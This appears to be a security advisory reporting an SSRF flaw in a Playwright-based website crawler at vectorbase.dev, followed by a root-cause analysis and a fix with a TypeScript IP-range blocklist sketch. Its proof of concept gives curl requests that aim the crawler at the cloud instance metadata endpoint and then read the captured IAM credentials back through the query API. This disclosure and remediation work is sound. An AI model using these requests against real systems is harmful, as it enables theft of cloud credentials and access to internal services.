Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist

Severity : High
CVSS     : 7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Endpoint : https://vectorbase.dev/api/sources/create
           https://vectorbase.dev/api/v1/sources (POST)


Summary
-------
The website source crawler in `src/lib/crawler.ts` uses Playwright to fetch any user-supplied URL and stores the resulting content as searchable chunks. It never checks that the target URL resolves to a public IP address, so any authenticated API key holder can point the crawler at internal services, such as the cloud provider's instance metadata endpoint, and then read the captured content back through the query API.

Steps / PoC
-----------
1. Create an API key via the dashboard. This requires a working account. Authentication is currently broken due to a Supabase misconfiguration, so this PoC describes the attack as it would run once auth is restored, or on a self-hosted instance with a valid account.

2. Create a website source pointing to the AWS IMDS:

```
curl -s -X POST https://vectorbase.dev/api/sources/create \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{
    "projectId": "<project-uuid>",
    "type": "website",
    "name": "Internal",
    "url": "http://169.254.169.254/latest/meta-data/"
  }'
```

Expected: the source is created and processing is triggered. The Playwright crawler fetches `http://169.254.169.254/latest/meta-data/` and stores the response (EC2 metadata, IAM credentials, etc.) as embedding chunks.

3. Retrieve the exfiltrated content:

```
curl -s -X POST https://vectorbase.dev/api/v1/query \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{"query": "iam credentials role", "projectId": "<project-uuid>"}'
```

Expected: response includes the IMDS content (IAM role name, access key ID, secret, token).

4. Root cause in `src/lib/crawler.ts`:

```typescript
const browser = await chromium.launch()
const page = await browser.newPage()
await page.goto(url, { timeout: 30000, waitUntil: 'domcontentloaded' })
// No IP range check before or after DNS resolution
```

The crawler sets `ignoreHTTPSErrors: true`, follows redirects, and has no allowlist filtering on the resolved destination IP. The `shouldCrawl` helper only filters by file extension and a short hardcoded path list — it does not block RFC 1918 or link-local addresses. The sitemap parser (`src/lib/sitemap-parser.ts`) has the same gap.

Impact
------
An API key holder can read the cloud instance metadata endpoint (IAM credentials, user-data scripts), internal HTTP services, and any address reachable from the deployment network, then query the stored chunks to extract the captured content.

Fix
---
1. Resolve each URL's destination IP before Playwright fetches it; block RFC 1918 (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local (169.254.0.0/16), and loopback (127.0.0.0/8) addresses, as well as hostnames matching `*.internal`.
2. Re-validate the resolved IP after any redirect, as Playwright follows redirects natively.
3. Consider a separate egress-restricted network sandbox for the crawler process.
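
A minimal sketch of the check described in fix items 1 and 2, assuming IPv4 only. The names `isBlockedIPv4`, `assertPublicUrl`, and the injected `Resolver` type are hypothetical and do not exist in the reported codebase. The resolver is passed in so the caller can wrap whatever DNS lookup the deployment uses. Anything that does not parse as IPv4 (including IPv6) is rejected here, which is a simplification rather than a recommendation.

```typescript
// Hypothetical helpers for illustration; not part of src/lib/crawler.ts.

/** Caller-supplied DNS lookup: returns every address the hostname resolves to. */
type Resolver = (hostname: string) => Promise<string[]>;

// Blocked IPv4 ranges from the Fix list, as [network, prefix length] pairs.
const BLOCKED_V4: Array<[string, number]> = [
  ["10.0.0.0", 8],     // RFC 1918
  ["172.16.0.0", 12],  // RFC 1918
  ["192.168.0.0", 16], // RFC 1918
  ["169.254.0.0", 16], // link-local (includes the metadata endpoint)
  ["127.0.0.0", 8],    // loopback
];

/** Parses a dotted-quad IPv4 string into an integer, or null if malformed. */
function ipv4ToInt(ip: string): number | null {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let value = 0;
  for (const part of parts) {
    if (!/^\d{1,3}$/.test(part)) return null;
    const octet = Number(part);
    if (octet > 255) return null;
    value = value * 256 + octet;
  }
  return value;
}

/** True if the address is in a blocked range or is not valid IPv4 (fail closed). */
function isBlockedIPv4(ip: string): boolean {
  const addr = ipv4ToInt(ip);
  if (addr === null) return true;
  return BLOCKED_V4.some(([network, prefix]) => {
    const base = ipv4ToInt(network)!;
    const size = 2 ** (32 - prefix); // number of addresses in the range
    return Math.floor(addr / size) === Math.floor(base / size);
  });
}

/** Throws unless every address behind rawUrl is outside the blocked ranges. */
async function assertPublicUrl(rawUrl: string, resolve: Resolver): Promise<void> {
  const host = new URL(rawUrl).hostname;
  if (host === "internal" || host.endsWith(".internal")) {
    throw new Error(`blocked hostname: ${host}`);
  }
  // IP literals are checked directly; names go through the injected resolver.
  const addresses = ipv4ToInt(host) !== null ? [host] : await resolve(host);
  if (addresses.length === 0 || addresses.some(isBlockedIPv4)) {
    throw new Error(`blocked destination for ${host}`);
  }
}
```

The same `assertPublicUrl` call would need to run on the initial URL and again on every redirect target before it is followed. A check like this does not by itself close the gap between validation and the browser's own DNS lookup, which is one reason the egress-restricted sandbox in item 3 remains worthwhile.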
